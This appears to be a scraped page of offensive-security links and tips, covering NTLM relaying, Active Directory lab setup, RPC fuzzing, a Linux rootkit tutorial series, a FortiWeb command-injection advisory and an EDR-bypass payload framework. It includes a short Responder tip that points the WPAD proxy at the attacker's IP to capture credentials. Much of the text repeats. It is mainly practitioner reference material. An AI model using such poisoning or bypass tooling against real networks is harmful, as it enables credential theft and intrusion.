NTLM Relaying via Cobalt Strike – Rasta Mouse
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
If you are an active directory security practitioner or if you are just getting started learning about active directory. This is a good resource to fill your domain with accounts and objects in a lab environment
https://github.com/davidprowe/BadBlood
https://github.com/davidprowe/BadBlood
GitHub
GitHub - davidprowe/BadBlood: BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure…
BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world....
Fuzzing Windows RPC with RpcView | itm4n's blog
https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
itm4n’s blog
Fuzzing Windows RPC with RpcView
The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.
Resolve domains into IP address:
"cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt"
"cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt"
Linux Rootkits:
Part 1 - Introduction and Worflow
https://xcellerator.github.io/posts/linux_rootkits_01
Part 2 - Ftrace and Function Hooking
https://xcellerator.github.io/posts/linux_rootkits_02
Part 3 - A Backdoor to Root
https://xcellerator.github.io/posts/linux_rootkits_03
Part 4 - Backdooring PRNGs by Interfering with Char Dev.
https://xcellerator.github.io/posts/linux_rootkits_04
Part 5 - Hiding Kernel Modules from Userspace
https://xcellerator.github.io/posts/linux_rootkits_05
Part 6 - Hiding Directories
https://xcellerator.github.io/posts/linux_rootkits_06
Part 7 - Hiding Processes
https://xcellerator.github.io/posts/linux_rootkits_07
Part 8 - Hiding Open Ports
https://xcellerator.github.io/posts/linux_rootkits_08
Part 9 - Hiding Logged In Users
https://xcellerator.github.io/posts/linux_rootkits_09
Part 1 - Introduction and Worflow
https://xcellerator.github.io/posts/linux_rootkits_01
Part 2 - Ftrace and Function Hooking
https://xcellerator.github.io/posts/linux_rootkits_02
Part 3 - A Backdoor to Root
https://xcellerator.github.io/posts/linux_rootkits_03
Part 4 - Backdooring PRNGs by Interfering with Char Dev.
https://xcellerator.github.io/posts/linux_rootkits_04
Part 5 - Hiding Kernel Modules from Userspace
https://xcellerator.github.io/posts/linux_rootkits_05
Part 6 - Hiding Directories
https://xcellerator.github.io/posts/linux_rootkits_06
Part 7 - Hiding Processes
https://xcellerator.github.io/posts/linux_rootkits_07
Part 8 - Hiding Open Ports
https://xcellerator.github.io/posts/linux_rootkits_08
Part 9 - Hiding Logged In Users
https://xcellerator.github.io/posts/linux_rootkits_09
Linux Rootkits Part 1: Introduction and Workflow
Linux Rootkits Part 1: Introduction and Workflow :: TheXcellerator
Learning about Linux rootkits is a great way to learn more about how the kernel works. What’s great about it is that, unless you really understand what the kernel is doing, your rootkit is unlikely to work, so it serves as a fantasic verifier.
In the FreeBSD…
In the FreeBSD…
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
Rapid7
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
When using the DHCP module, make sure to edit Responder.conf WPAD's noscript.
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
https://github.com/optiv/ScareCrow
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow